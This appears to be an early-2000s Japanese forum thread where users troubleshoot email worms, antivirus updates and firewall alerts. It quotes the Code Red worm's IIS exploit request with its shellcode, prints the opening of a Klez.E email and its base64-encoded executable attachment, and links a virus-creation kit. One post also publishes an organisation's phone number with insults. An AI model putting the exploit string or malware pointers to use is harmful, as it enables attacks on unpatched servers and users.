ヘッダー読むと1通は *.att.ne.jp
もう1通はtwドメインだった。
添付ファイルのサイズは82kb
HTMLファイルとウイルスの2つのファイルが添付されている。
このウイルス何?色々調べたんだけど見つからず。
0206名無しさん@お腹いっぱい。
NGNGウィルスがenvelope senderを詐称して送っている可能性あり。
送った先に届かないと、エラーメール(差出人は当然postmaster)は
ウィルス送信者ではなく、envelope senderに届く。
envelope senderは必ずしもヘッダのFrom:とは一致しないので注意。
最近流行したものだと、Klezがこのような送信者の詐称をおこなう。
Klez.Eならファイルサイズもほぼ一致する。詐称するアドレスのリストは
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3250KLEZ.htm
http://www.nai.com/japan/virusinfo/virK.asp?v=W32/Klez@MM
にあるが、どうやらこれ以外のアドレスでウィルスを送信する亜種も
大量に出回っている模様。
0207名無しさん@お腹いっぱい。
NGNGどのような害があるのですか?
0208205
NGNG情報ありがとうございます。
おそらく亜種かと思います。
もう少し調べてみます。
0209名無しさん@お腹いっぱい。
NGNGウィルス辞典で自分で調べろ
0210
NGNG0211名無しさん@お腹いっぱい。
NGNGPC起動時にウイルスチェックにスケジュールしてるけど
起動時にウイルスチェックが動かんぞ。
なんでかね?
0212名無しさん@お腹いっぱい。
NGNGOSは何ね?
0213名無しさん@お腹いっぱい。
NGNGあっ、ごめん。
XP Proっす。
0214名無しさん@お腹いっぱい。
NGNGCODEREDがIISサーバーに攻撃かけるときに
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0
003%u8b00%u531b%u53ff%u0078%u0000%u00=a
って文字列飛ばすけど
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u
cbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
この部分って何やってるの?
0216名無しさん@お腹いっぱい。
NGNGメンテしてたんですけど、トレンドがテスト用に配布してる Eicar.com
ってテストウイルスがあるじゃないですか。それで送受信のテストを
してたんですけど、チェックすり抜けちゃうんですけど・・・
昨日も同じテストを実施して、そん時はちゃんとテストウイルスを
ブロックしてたし、InterScan が入ってるサーバが2台ほどあるんですが
どっちもすりぬけちゃってるんです。
個人的には今日になって更新されたパターンファイル214が怪しいと
踏んでいるのですが、どなたか同じようにはまってませんか?
0218名無しさん@お腹いっぱい。
NGNGシステムの構成を詳しく書かないとわからん
0220名無しさん@お腹いっぱい。
NGNGさっき、216 になったけど、それかな?
って、216!!
0222名無しさん@お腹いっぱい。
NGNG214でも大丈夫だったと思う。
0223名無しさん@お腹いっぱい。
NGNGでもチョット突っ込み弱いネ
「パターン>>216かよ!!」
0224名無しさん@お腹いっぱい。
NGNGVB2002、VBCorpでも。
0225名無しさん@Emacs
NGNGOKならトレンドにクレーム
NGならおまえの設定がアホ
いずれにしてもここでうだうだ言ってても埒があかんずら。
0226205
NGNG私に送られてきたKlez.Eなんですが、どうやらウイルスによって
送信されたメールではなく、悪意ある人間の仕業のようです。
理由は
・envelope-fromとFromが異なり、Fromだけpostmasterを名乗っていること
・twドメイン内にある、「envelopeを偽装することで」第三者中継が可能と
なるSMTPサーバーからメールを送信していること
・同一のマシンから、別の第三者中継が可能なSMTPサーバー経由でもう1通別の
ウイルス付きメールが送られてきたこと
206さんはエラーメールが「本物の」postmasterによって返信されることで私
に届いたのでは?とおっしゃっていましたが、今回postmaster@HOGEHOGE.COMと
なっている「HOGEHOGE.COM」の部分はただの転送メールアドレスなので、
postmasterアカウントでメールが送られることはあり得ないです。また、ヘッダー
のReceivedを追ってみてもそれが確認できます。
で、このウイルス送信しまくりなマシンのIPは
*.ftthosaka.att.ne.jp
なんですが、どなたか同じように送られてきた方いらっしゃいませんか?
0227名無しさん@お腹いっぱい。
NGNGビンゴォー!!!
ってか?(笑
すげいなぁ
0228名無しさん@お腹いっぱい。
NGNGデスクトップに「Death-Gm02」って18MBほどのmpegファイルが
あったのよ。
ダウンロードした覚えはないんだけど、開いてみたら延々とテトリ
スをやってる動画が流れてる・・・これってウイルスなのかな
0229名無しさん@お腹いっぱい。
NGNGダウンロードした覚えがないのにデスクトップにあったというのが疑問だけど…
ぐぐるで検索したらこんなんでました。
http://www.google.com/search?hl=ja&q=Death-Gm02+%83E%83B%83%8B%83X&lr=
0230206
NGNGそのウィルスつきメールだけど、下にあるみたいな感じだよね?
調べてみたら、うちの鯖でKlez.Eとして隔離されたものからいくつか見つかった。
# postmaster@microsoft.comもあったぞ(藁
おれが206で書いたのとは違って、205のアドレスを詐称しているわけではなさそうだ。
たしかにpostmasterからのエラーを装ってるけど、エラーをHTMLメールで
返すはずがないね。ただ、誰かが悪意を持って送信したのではなく、
ウィルス自身がこういうフォーマットで送ってるんだと思う。
att.ne.jpってAT&T JENSだっけ。サポートに連絡して、ウィルス感染者に
警告してもらうといい。ヘッダのIPアドレスと時刻からユーザが特定できるはず。
From: postmaster <postmaster@HOGEHOGE.COM>
To: fuga@fugaufuga.com
Subject: Undeliverable mail--"xxxxx" ← Returned mail--"xxxxx" ってのもあった
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=ZmH1Mo98155HReb00x
--ZmH1Mo98155HReb00x
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<FONT>The following mail can't be sent to fuga@fugafuga.com:<br>
<br>
From: hoge@HOGEHOGE.COM<br>
To: fuga@fugafuga.com<br>
Subject: xxxxx<br>
The attachment is the original mail</FONT></BODY></HTML>
--ZmH1Mo98155HReb00x
Content-Type: application/octet-stream;
name=Lfm.bat
Content-Transfer-Encoding: base64
Content-ID: <O0g53nSe8439rt>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
以下略
0231名無しさん@お腹いっぱい。
NGNG結局のところ、パターン214で eicar のチェック漏れがあったとのこと。
トレンドマイクロへ確認しました。
BADTRANS とか HYBRIS とか送り付けてみましたがこっちは214でもOK。
今はパターン216になって、元に戻ってます。
0232205
NGNG>>230
お返事ありがとうございます。
>そのウィルスつきメールだけど、下にあるみたいな感じだよね?
その通りです。HTMLのタグの感じとか、メッセージ内容などまるっきり同じです。
>エラーをHTMLメールで返すはずがないね
なるほど、言われてみればその通りですね。気が付かなかった。
さすがですね
>誰かが悪意を持って送信したのではなく ウィルス自身がこういう
>フォーマットで送ってるんだと思う。
どうやらその可能性が高いようですね、失礼しました。
ウイルスがわざわざenvelope-fromを適当なものに変えてまで
第三者中継可能なSMTPサーバーを利用しているのが不自然に思えたのです。
Klezがどのようにして送信に利用するSMTPサーバーとenvelepe-fromに使う文字列を
決定しているのかにちょっと興味があります。
もしかしたら、このウイルス感染しているマシンはSPAM送信業者の物であるかも
しれません。なぜかというと、彼から送られてきたメールが3通ほどあるのですが、
どれも利用された私のメールアドレスはSPAMが頻繁に送られてくるものだったからです。
また、それならば第三者中継可能なSMTPサーバーを普段から利用しており、
Klezがマシンからその情報を手に入れてメールを出してきたということも考えられます。
1点だけ確認させて頂きたいのですが、206さんが受け取ったそのメールの送信元は
att.ne.jp以外でしたでしょうか?
よろしくお願いします。
なお、彼からの送信は1/28あたりで終わっておりそれっきりなようですので、
ISPへの連絡は(めんどうだし)しないつもりです。
0233第三中継可能 cc.sookmyung.ac.kr
NGNGReceived: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: tryingtokeepup@yahoo.com
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
benefactored@yahoo.com
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me tryingtokeepup@yahoo.com
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >
< 250 < http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >... Sender ok
> RCPT TO:<rlytest@nanet.co.jp>
< 250 <rlytest@nanet.co.jp>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
0234名無しさん@お腹いっぱい。
NGNGファイアウォールのログは
インバウンド UDP パケット
ローカルアドレス,サービスは xxx.xxx.xxx.xxx,1900
リモートアドレス,サービスは xxx.xxx.xxx.xxx,1025
プロセス名はMPREXE.EXE
と言うものでした
これってなんですかね?
何かわかる方がいらっしゃいましたらお願いします
0235206
NGNG>Klezがどのようにして送信に利用するSMTPサーバーとenvelepe-fromに使う文字列を
>決定しているのかにちょっと興味があります。
Klez.Dのときに某アンチウィルスベンダーの技術者の人から聞いたところによると、
送信に使う鯖は、メールアドレスの @ 以降のドメイン名の頭に"smtp."を
つけたものになるそうな。つまり、mona@2ch.netで出そうとするときは、
smtp.2ch.netという鯖を使うことになる。
送信に使うアドレスは、アドレス帳にあるものを使う場合と、ウィルスの中に
いくつか埋め込まれているものを使う場合の2とおりあるらしい。
>1点だけ確認させて頂きたいのですが、206さんが受け取ったそのメールの送信元は
>att.ne.jp以外でしたでしょうか?
韓国です。言葉が通じません。どないせぇ言うんじゃ。
0236205
NGNG>韓国
韓国でしたか。
おかげさまで色々分かりました。どもありがとうございます。
0237名無しさん@お腹いっぱい。
NGNG自分自身のフォルダに、ウィルスメールを送りつけまくる。nimdaなら容量が
決まってるじゃないですか。ところがこいつは、各フォルダの容量ごとに変わる。
ネットにつなげない、ウィルス対策をしてなかったので(あはははは)、オンライン
チェックしたくても、ウィルスソフトを使おうにも、使えん。
どーしたもんでしょ
0238眠い人
NGNG投げて旅に出よう。
0239名無しさん@お腹いっぱい。
NGNG♪旅は〜まだ〜終わら〜ない〜〜〜♪
・・・ぷろじぇくとXしてる場合ではなかった。おながいします。
0240名無しさん@お腹いっぱい。
NGNG>自分自身のフォルダに、ウィルスメールを送りつけまくる。
先生!意味がサパーリわかりません。
0241名無しさん@お腹いっぱい。
NGNGネットにつなげないので、自分自身に送りつけまくってるもよう。うぐぅ
0242名無しさん@お腹いっぱい。
NGNGウィルス対策ソフトを買って下さいNE!
0243名無しさん@お腹いっぱい。
NGNG最新プログラムを入手でけないのです!
IEを使おうとしても、”exe何ちゃらが壊れてるので開けません”って・・・ウィルスのせいか?
何とかnimdaチェックは出来たのですが、nimdaではなかった
0244名無しさん@お腹いっぱい。
NGNGもーOS再インストールせよ。
0245名無しさん@お腹いっぱい。
NGNG0246名無しさん@お腹いっぱい。
NGNG最近「インバウンド UDP でアクセス受けた」って人の質問が妙に多い。
そのログにある、インバウンド UDP パケット の直前に
アウトバウンド UDP パケットがあなたのPCから出てませんか?
UDP パケット はTCPのように3wayハンドシェイクを行わないので
相手から投げたパケットか、自分で要求した返答パケットなのか、
わからないのです。だから、ファイヤーウォールの設定が
インバウンドのUDPを全てブロックする設定になっていたら
当然、そのような返答パケットもブロックされます。
蛇足ですが MPREXE.EXEは、Windowsで用意された通信プログラムで、
UDPクライアントでもあります。
0247abc
NGNGhttp://www.yentown.net/erodepa-town/gal/nozokiya.html
0248
NGNG数10GBデータがあるの!でーーーーーーす
なのでリカバリーを避ける道はないものかとあがいておりますぅ
ウィルス対策ソフトも何もしてなかったのかゴルァっつうお叱りは
甘んじて受けますぅ
ととにかくデータバックアップばんがりますぅ
0249名無しさん@お腹いっぱい。
NGNGWin98〜Meなら
「exe何ちゃらが壊れてるので開けません」の何ちゃらを
msconfigまたはシステムファイルチェッカーから復元してみては?
0250
NGNG0251名無しさん@お腹いっぱい。
NGNG同感。確かにその系統の質問多いな。
>>243とまったく同じパターンで
「へんなヤツが俺のPCに不正アクセスしてきて、MPREXE.EXEを開こうと
しやがった!どうやって仕返ししたろか?」…ってなアフォもいた。
0253名無しさん@お腹いっぱい。
NGNGパーティション切ってシステムとデータ分けるといい
0254名無しさん@お腹いっぱい。
NGNG重くなったと思ったらPE-CHIに感染してた
で、全部駆除してもまだOutlook Expressのみ起動が重くて
ずっとウェイトがかかってる・・・
5分くらいしてようやくOutlook Expressが起動したと思ったら
POP3サーバーとメールサーバーのログインIDとパスワードが書き換わってた
ウイルスバスター2002の体験版で検索してもウイルスにはもう引っかからないのですが
Outlook Expressの起動は以前直りません、だれここの症状に心当たりのある方は
いらっしゃらないでしょうか?
0255名無しさん@お腹いっぱい。
NGNG質問はageないと・・
ちなみに私はわかりません。
0256
NGNG0257名無しさん@お腹いっぱい。
NGNGhttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2219
>本来であればWINDOWS\SYSTEMフォルダに存在するIMAGEHLP.DLLが、何らかの理由により削除されると、OutlookExpressの起動が非常に遅くなります。
>同様にIMAGEHLP.DLLのファイルが削除されている場合、ウイルスバスター2001のオンライン登録時に、各種項目を入力後、送信ボタンをクリックしてからライセンキーが表示されるまでに2分〜5分ほどの時間がかかってしまうことがあります。
>ウイルスバスター2001を始め、従来のウイルスバスターにおきましても、インストール時やアンインストール時、あるいは普段の使用において、IMAGEHLP.DLLを削除する事はありません。
>したがって、ウイルスバスターをインストールする前に、既存の他社製アンチウイルスソフトのアンインストールを行う過程で削除された可能性があります。
>具体的には、McAfee社のVirusScanをアンインストールすると削除される場合があるようです。
>このような場合はWindowsのCD-ROMや、同じWindowsがインストールされた別のPCなどから、 IMAGEHLP.DLLをWINDOWS\SYSTEMフォルダに復元されることをお勧めいたします。
マカフィー入れてませんでしたか?
0258名無しさん@お腹いっぱい。
NGNGで、忘れていてPCの電源切ってしまいました。
するとPC起動できなくなってしまいました。
どうしたら治りますか?
0259名無しさん@お腹いっぱい。
NGNG0260名無しさん@お腹いっぱい。
NGNG1Gのゲーム落としたばっかなのに・・・
0261
NGNGこのページ、ウイルスを食らわせるらしいんですが、詳しくはどのようなものなんでしょうか?
0262名無しさん@お腹いっぱい。
NGNG返答ありがとうございました、無事解決する事が出来ました
それと、マカフィーは入れてませんでした
最初のPE-CHIを退治する時に結構な数のファイルが隔離されたので
それが原因だったかもしれません
しかも隔離されたファイルを見ても
削除して問題なさそうだったので一括して消してしまいました
多分この中に必要なファイルがあったのかも知れないと思い
本日上書き再インストールしたところ直りました
0263名無しさん@お腹いっぱい。
NGNGもうそれ見飽きたよ。
単なる~crazyghost/goto.htm"のコピーだし。
0265名無しさん@お腹いっぱい。
NGNG移転したんでしょうか?
0266265
NGNGくだらない質問してすいません。
トップページからのリンクは無いけど
http://people.site.ne.jp/2002/
とかは見えるよ
0268質問です
NGNG、よく知らない相手なので心配です。そのプログラムをもらうのは、
危険でしょうか。メールでもらうだけでも危険でしょうか?
怖かったのでメアドは持ってないと答えましたが、
IEからダウンロードできるようにしてあげるといわれました。
「○○○なソフトがあると便利だな」って話をしてたら、
作って上げるよってことになったのですが、どうも怪しいのです。
メールでもらったり、IEでダウンロードするだけでもダメでしょうか?
相手はかなりプログラムに詳しい人でプロだそうです。
0269cheshire-cat
NGNGとりあえずもらっておいて、「相性が悪かったのか起動できなかった」とでも言っとけば?
0270質問です
NGNG0271名無しさん@お腹いっぱい。
NGNGダウンロードもIEの最新パッチあててないなら止めとけ。
0272cheshire-cat
NGNGノートンやバスターで検出できないトロイ、たくさんあるし。
用心はしすぎるって事はない。
あなたが本能的に怪しいと思った人を、信頼する理由なんて無いよ。
0273初心者
NGNGウィルス定義したいんですけど
0274cheshire-cat
NGNGシマンテックはユーザーのアカウントを米国で一括管理しているんだけど、時々「不具合」が生じてLiveUpdateで更新できなかったりする。
直接ひっこ抜くとか。ちなみに今の最新定義ファイルの日付は1月30日。
http://www.symantec.com/region/jp/sarcj/defs.download.html
0275名無しさん@お腹いっぱい。
NGNGああそうなのか。俺がバスターに乗り換えた理由のひとつ。
0276名無しさん@お腹いっぱい。
NGNGどこから感染したか分かるのでしょうか?こんなのがでてきたのですが
js.exception c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\removeithta
0277名無しさん@お腹いっぱい。
NGNG亀レスですが、どうもです。
なんとかアップデートできました
0278名無しさん@お腹いっぱい。
NGNG添付ファイルがついてるといわれました。
送った相手も初心者だったので、開いてしまったらしいんですが
中身は何も書かれていない空のファイルだったとの事です。
hotmailを使っているのですが、今までウィルス等の害を
くらったことがなくて、全然自体が把握できません。
俺も相手のパソコンも今のとこ支障なく動いてるんですが
これってウィルスなんですか?
0279cheshire-cat
NGNGhotmailって、添付ファイルのウイルスを駆除してくれなかったっけ?
0280名無しさん@お腹いっぱい。
NGNG自分も不注意に添付ファイルを開いたような記憶はないんですが。
0281
NGNG昨日買ったものはスカパーのチューナー。昨日深夜に帰宅したので今日設置したのですが、なんという運の悪さ。
朝から雨。プラス雪。凍えるぐらいに寒い。雨の中ベランダにアンテナを設置しました。買ったのは Sony SAS-SP1SET。
ビックカメラで 19800 円。今買うと購入時 10% ポイント還元だけでなく、スカパーとの契約時にビックカメラから10000 ポイント還元。
実質 8000 円程度で購入してます。これを MTV2000 に回せる!と思いきや、ポイントが入るのは1ヶ月先とのこと。残念無念。
0283
NGNG0284ねこ
NGNGそのファイル名が「HUMOR.MP3」だったんですけど、これってウィルスですか?
0285名無しさん@お腹いっぱい。
NGNGそれグーグルで検索すると山のようにヒットするが?
0286名無しさん@お腹いっぱい。
NGNGとりあえず、>>278と>>284はチェックしとけよ。
(↓シマンコテックオンラインチェック)
http://security2.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=OEUTLSIVFWMFKPXKBQW
0287284
NGNG0288名無しさん@お腹いっぱい。
NGNGたまーにブラウザを立ち上げると画面が真っ白になって
それ以後何も受け付けず、Ctr+Alt+Deleteをすると
画面が真っ暗になって電源を切るよりしかできなくなってしまいます。
WinMEは再インストールしたばかり。
心当たりといえばわけわからんリンクをクリックしてしまったのと
身元不明のメールを即削除したぐらいなんですが…
どなたかそういうウィルスやらブラクラだか知ってる人はいないでしょうか?
0289288
NGNGIE5.5でした。
0291
NGNGブラクラは除外できる可能性は高いよ。
(ほとんど、窓を沢山開かせてフリーズとかさせるだけ。
ただし、+アルファのものが絶対にないとは言えないが。)
ウイルスなどそういう悪意のプログラムによるかどうかは
分からないけど、現象としてIEが何かおかしい可能性は
ものすごく高いと思う。
この際だからまずは、ノートンかトレンドマイクロの
アンチウイルスソフトを買う。それに先だってオンラインスキャンも
やっておいていいかも。
それから、IE5.0は修復。。。といいたいところだけど、
この際5.5+SP2か6にバージョンアップしてしまっていいのでは?
最後にMEを再インストールしたと書いているけど、
上書きインストール(修復インストール)だと改善されない
トラブルは多いので、面倒でもクリーンインストールする方が
結局は早いことが多いよ。
0292眠い人
NGNGnpo-fwa@minos.ocn.ne.jpからBADTRANS.B型が届きました。
特定非営利活動法人「木の建築フォラム」とか名乗っていやがります。
ただこれだけなら別に曝すつもりはなかったのですけど、電話応対に出たババアがオオバカで
前の総理の森総理大臣みたいなクルクルパーでしたので。
ちなみに電話番号は03-5144-0056です。
0293288
NGNG回答ありがとうございます。
MEは一応クリーンインストールしたんですよ。
っで一週間もたたないうちにトラブッたんでちょっとショックを…
とりあえずIEのバージョンアップ、ダメならウィルスソフト、
それでもダメならクリーンインストール、っという感じで
やってみようかと思います。
ありがとうございました!
0294名無しさん@お腹いっぱい。
NGNGInterScanとVirusScan使ってますがどちらにも引っかかりません。
送信者:fun@******(******は感染者使用のドメイン名、一応ふせときます)
件名:A IE 6.0 patch
本文[2行]:This is a IE 6.0 patch(改行)I wish you would like it
添付:ATT00003.txt(138byt)、README.TXT(3.12KB)
0295npo-fwa@minos.ocn.ne.jp
NGNG特定非営利活動法人「木の建築フォラム」
〒104-6204 東京都中央区晴海1-8-12 オフィスタワーZ4F
−−−−−
http://www.forum.or.jp/forum-tsushin/forum-tsushin-1.pdf
に npo-fwa@minos.ocn.ne.jp がある。
0296検出名を教えてくださいませませ
NGNGウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
0297名無しさん@お腹いっぱい。
NGNG0298↑無理だと思われ
NGNG0299名無しさん@お腹いっぱい。
NGNGReturn-Path: <MAILER-DAEMON>
Received: from flora330 (pl171.nas511.yokosuka.nttpc.ne.jp [210.165.82.171])
添付ファイル PLBNKMPL.EXE ってのが来ましたがなんでしょうか。
0300名無しさん@お腹いっぱい。
NGNG0301名無しさん@お腹いっぱい。
NGNGHybris
0302名無しさん@お腹いっぱい。
NGNG大丈夫だと思いますが・・・。
0304Hybrisはスクリプト?
NGNG0305名無しさん@Emacs
NGNGできればその根拠も教えていただきたく。
0306名無しさん@お腹いっぱい。
NGNG添付ファイル名
0307ごん太
NGNG8文字.exe
頭----尻
PL----PL←(同じ)
同じファイル名生成ルーチン組んだ別物出ればこの限りじゃないけど(w
0308名無しさん@Emacs
NGNGなんで断定できるんじゃ、と思っとったんだが、なるほど、
([A-Z]{2})[A-Z]{4}\1.EXE なのね。ありがと。
↑正規表現わからんと意味不明だな。
0309名無しさん@お腹いっぱい。
NGNG加えてメール本文なし、ファイルサイズ23k(28k?)なら確定。
0310名無しさん@お腹いっぱい。
NGNG0311名無しさん@お腹いっぱい。
NGNG* !^To:.*@
* Return-Path:.*<>
* Content-Type:.*multipart/mixed;.*boundary="--VE.*
ゴミ/.
拾いモン(w
0312名無しさん@お腹いっぱい。
NGNGsugoiってやつ踏んでしまってへこんでいます・・。
win検索でファイルが4個出てきて
削除しようとしたら、起動の方をクリックしてしまって
今度は名前が違ったように思えたのですが
sugoiはそのまま削除しましたが
違う名前でファイルにいるのでしょうか?
だれか知ってる方、教えてください!!
初心者なのでどうもすみませんです〜(泣
あわてている気持ちは分かるが、もうちょっと状況を整理して
書き込まないと。
まず、ブラクラとウイルスは違うし。
あるURLをクリックしたら(下手に「踏んだら」なんて言葉を
使わない方がいいと思うよ。)、窓が次々と開いて
フリーズしたというような、現象を見たのか。
そうならブラクラ。
sugoiってやつ、といわれても。URLとか、どこにあったとかの
情報はないのか。
WIN検索とは何なのか。何を検索したら4個出てきたのか。
> 削除しようとしたら、起動の方をクリックしてしまって
はまだしも、
> 今度は名前が違ったように思えたのですが
> sugoiはそのまま削除しましたが
の二つの分の関連がよく分からない。
とりあえず、
初心者ですごくていねいに説明してもらわないと、というなら
PC初心者板をおすすめする。
それから、閲覧するだけで感染するウイルスなどを心配して
いるのなら、トレンドマイクロとか、シマンテックのサイトで
オンラインスキャンをお奨めする。
その後は、このどっちかのアンチウイルスソフトを購入して
入れておく方がいいかと思う。
0314312です
NGNGレスありがとうございます!!!
まだ混乱してるので分かりにくい書き込みですみません。
yahoo板の「ヤフオク最悪な出品者と最悪な落札者」95
htp://www1.harenet.ne.jp/~m-toyota/kiken/bc/sugoi.htm を
クリックしてしまいました。窓がつぎつぎと出てくるわ、pcはガゴガゴいうし、
パニクッてしまって窓を消すのに精一杯でした(汗。
その後、winスタートから
検索でファイルやフォルダの検索をし(sugoi で)
ファイルが4個表示されて、これを見た瞬間また混乱してしまい
削除をするはずがクリックして開けてしまったのです。
そしたらまたsugoiがウヨウヨ出てきて
そのとき出てきた物の名前が違ったように思えたのですが
sugoiが開くたびに名前が変るとかあるのでしょうか?(わかりにくくてすみません汗)
急いで消してしまったので名前すらわかりません。
まだpcの中に残っているのか不安でたまらないです。
今後、pcに影響があるのか心配で心配で・・
もう泣きっぱなしです・・今後は下手にクリックはしないようにします・・。
0315名無しさん@お腹いっぱい。
NGNGアプリ起動しようとすると
しつこくFrontPageのインストーラが
でてくるんですけど
これってウイルスですか?
ウイルスバスターでは
何も検出されないんですけど、、
0316名無しさん@お腹いっぱい。
NGNGmailto ストーム
FDD アタック
びびるが、ウイルスではない。
0317名無しさん@お腹いっぱい。
NGNG多分インストール途中でやめたかなんかで、Officeインストーラが
ストーカー化している状態と思う。
Officeはいろいろと変なことするよ、経験上いうけど。
ただし、通常はOffice系のアプリを起動しようとしなければ
出てこないはずなので、スタートアップなどに何か入っているかも。
OSがないから分からないけど、システム情報のシステム設定ユーティリティか
コマンドのmsconfigとかで確認したほうがいいと思う。
そゆことで、こころあたりがあればビジネスソフト板のオフィス系のところか、
こころあたりがないなら、WIN板の該当するOSの質問スレあたりの方が
適当だと思うよ。
0318検出名を教えてくださいませませ
NGNGhttp://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
0319
NGNGBフレッツの10Mです。8MのADSLが通らないエリアだったこともありますが、新物好きなので、光ファイバーにしたのです。
5,000円+プロバイダー料金ですので、6〜7,000円位で、PCが5台まで接続できますので、考えようですが、ずいぶん安いと思います。
様子を見て、100M(9,000円)にしようかなと思いますが、PCとかルーターの性能が追いついていないので当分はこのままにしようと思います。
使ってみると掲示板が2秒ちょっとで表示されますので、快適です!ただ、ネットスケープ6.2は、途中でネゴシエーションが何回もストップして、遅いです。
旧バージョンのネットスケープ4.2の方が快適です。ということで、靴の前にPCが欲しくなってきました。
画面がXGAではちょっと狭いので、UXGAかSXGAのノートパソコンがいいかなと物色していたのですが、VAIOしかないですネ。
う〜ん、一番性能がいいタイプは30万円位ですので、買うには気合が必要です・・・。
靴を買うか、PCを買うか、本当に悩ましいです。30万円あると、日本でもウゴリーニなどのビスポークが2足できます。
フランスでなら、ウェストンのコンピューターオーダーが2足、ベルルッティのビスポークも1足できます。
比較の対象が、靴になってしまうところが、私らしいですネ(笑い)。いずれにしても、購買意欲は高まっています。
日本大不況の一般人への浸透の訪れを予感していながら、反省していません・・・。
0320名無しさん@お腹いっぱい。
NGNGで?
0321仕様書無しさん
NGNGなんででしょう?どっかに穴があいてるんでしょうか?
0322cheshire-cat
NGNGIISを直接攻撃するのはパッチあてればいい。
どっかのHPを見て感染するのは、IE6入れればいい。
メル感染もパッチ入れればいい。
LAN感染は、OSが入っているフォルダを丸ごと共有にしなければいい。
結局ノートンかバスターでも入れとけばいい。
0323犬
NGNG[Virus Can Exploit Long Path under NTFS to Evade Detection]
↑これ、、、やばくない?(w
アッ、アッ・・・・アッ!・・奥まで入れちゃイヤ〜ン
0324仕様書無しさん
NGNGありがたまきん。
0325cheshire-cat
NGNGやばそうだね。
でもMSに比べればシマンテックって対応早いから、何とかなりそうな気も。
0326名無しさん
NGNGって何でしょうか?
踏んでしまって、何かインストールされたようなのですが。
0327cheshire-cat
NGNG先日踏んだけどさ、それってジャバスクで変な別窓開くだけで、インストなんかされない。
悪質なジョークサイトみたいなもの。
「どこにインストールされるのか私もわかりません」なんて言葉で、余計に不安を煽っているだけ。
0328名無しさん@お腹いっぱい。
NGNGインストールされてない
0329音痴
NGNGStartメニューをあけて、例えばプログラムの右側には「>」があるじゃないですか?
それが何故か、数字の8に変わってしまったのです。
あと、exploreの最小化のアイコンが数字の「0」に、最大化は1.閉じるもなんかわけわからない数学的記号になってます。
おまけに、internet exploreのツールバーの「←戻る」の横に6があります。
これってvirusなのでしょうか?すいません、教えてください。(無知なもので。。。)
もし設定で直せる場合も教えてください、おねがいします。
0330326です
NGNGありがとうです。
0331名無しさん@お腹いっぱい。
NGNG書き間違ったスレ見ろ とっくに答えが出ている
0334名無しさん@お腹いっぱい。
NGNG各フォルダ内の全メールをまとめて1つのファイルに保存するタイプの
メーラーを使っているため、そのフォルダ内のメールはすべて読むことができない状態です。
ノートンのウイルススキャンで発見されたものの、ファイルの修復ができず
